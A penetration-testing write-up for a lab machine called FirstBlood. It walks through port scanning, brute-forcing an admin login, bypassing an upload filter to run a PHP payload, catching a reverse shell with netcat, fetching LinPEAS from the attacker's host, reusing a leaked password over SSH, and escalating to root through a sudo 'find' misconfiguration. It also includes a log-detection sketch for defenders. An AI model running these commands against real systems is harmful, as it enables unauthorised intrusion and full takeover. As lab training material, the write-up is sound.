This report documents the exploitation of the FirstBlood lab environment. The objective was to identify vulnerabilities in the web application, gain initial access, and escalate privileges to root.

🔹 Reconnaissance

I began with a full port scan against the target machine:

nmap 172.18.13.234 -T4 -A -p- -vv

Open Ports Found:

22/tcp → OpenSSH 9.6
80/tcp → Apache httpd 2.4.65

The web server hosted a corporate website:

SecureCorp — Web Development Services

🔹 Information Gathering

While analyzing the website, I discovered an email address:

info@securelycorp.local

This revealed an internal domain:

securelycorp.local

I added it to my hosts file:

echo "172.18.13.234 securelycorp.local" | sudo tee -a /etc/hosts

🔹 Directory Enumeration

Using directory brute-force techniques, I discovered hidden endpoints:

/admin
/upload

Both endpoints required authentication, indicating administrative functionality.

🔹 Admin Panel Discovery

The /admin endpoint redirected to:

/admin/login.php

This confirmed the presence of a login portal.

🔹 Authentication Bypass via Brute Force

Because the login form had no rate limiting, a brute-force attack was performed against it.

Using Burp Suite Intruder, valid credentials were discovered:

Username: admin
Password: admin123

Access to the admin dashboard was successfully obtained.

🔹 File Upload Exploitation

Inside the admin panel, a file upload feature was discovered. However, direct PHP uploads were blocked.

🔧 Bypass Technique:

The file was renamed before upload:

hacker.php → hacker.php.jpg

The upload request was then intercepted and the extension changed back to .php.

The payload was then executed at:

http://securelycorp.local/uploads/hacker.php

🔹 Reverse Shell Access

Before execution, a listener was started:

nc -nvlp 1234

Upon triggering the payload, a reverse shell was obtained successfully.
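
Both footholds above leave traces in the Apache access log: the unthrottled POSTs to /admin/login.php and the PHP file served from /uploads/. The following detection sketch is an added example, not part of the original write-up; the combined log format, the thresholds and the sample lines are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log format: client, timestamp, request line, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?")[0], int(status)

def detect(lines, max_posts=5, window=timedelta(seconds=60)):
    """Return (kind, ip, detail) alerts; thresholds are assumptions to tune."""
    recent = defaultdict(deque)  # ip -> timestamps of recent login POSTs
    flagged, alerts = set(), []
    secs = int(window.total_seconds())
    for ip, when, method, path, status in filter(None, map(parse, lines)):
        if method == "POST" and path == "/admin/login.php":
            q = recent[ip]
            q.append(when)
            while when - q[0] > window:  # drop attempts outside the window
                q.popleft()
            if len(q) > max_posts and ip not in flagged:
                flagged.add(ip)
                alerts.append(("login-bruteforce", ip, f"{len(q)} POSTs in {secs}s"))
        # A script served successfully from the upload directory is suspect.
        elif (path.startswith("/uploads/") and path.lower().endswith(".php")
              and status == 200):
            alerts.append(("upload-script-exec", ip, path))
    return alerts

def sample_log():
    # Constructed sample lines, not captured from the lab.
    fmt = '{ip} - - [12/Mar/2025:10:00:{s:02d} +0000] "{req} HTTP/1.1" {st} 512 "-" "ua"'
    rows = [fmt.format(ip="203.0.113.7", s=s, req="POST /admin/login.php", st=200)
            for s in range(8)]
    rows.append(fmt.format(ip="198.51.100.4", s=20, req="POST /admin/login.php", st=302))
    rows.append(fmt.format(ip="203.0.113.7", s=30, req="GET /uploads/hacker.php", st=200))
    rows.append(fmt.format(ip="198.51.100.4", s=40, req="GET /uploads/logo.jpg", st=200))
    return rows

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

The second rule only detects the symptom; the underlying fix is for the server to enforce the extension allowlist on the filename it actually stores and to disable script execution in the upload directory.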

🔹 Initial System Access

After gaining shell access:

/root → access denied

/home → user directory found (webdev)

This confirmed low-privileged access.

🔹 Privilege Enumeration

First download linpeas.sh on your own machine:

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

Then, from the directory where it was downloaded, start an HTTP server with python3 -m http.server so the target can fetch the file.

LinPEAS was transferred and executed for system analysis:

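# On your machine: serve the directory containing linpeas.sh
python3 -m http.server 8000

# On the target: fetch the script, make it executable and run it
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh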

🔹 Credential Discovery

During enumeration, database credentials were found:

DB_USER: dbuser

DB Password: DevPass2024!

🔹 SSH Access (port 22, found in the nmap scan)

An SSH service was available on the target.

The initial login attempt as the DB user failed, but reusing the same password with the system user succeeded:

THE FIRST FLAG IS IN LOCAL.TXT

Username: webdev
Password: DevPass2024!

SSH access was successfully obtained.

🔹 Privilege Escalation

Privilege enumeration revealed a sudo misconfiguration:

sudo -l

The user could execute /usr/bin/find with elevated privileges.

🔥 Root Exploitation

Using the misconfigured binary, root access was achieved:

sudo find . -exec /bin/bash -p \;

This spawned a root shell.

🔹 Final Result

THE PROOF.TXT IS OUR 2ND FLAG

Root access was successfully obtained and all flags were retrieved.

THANK YOU!!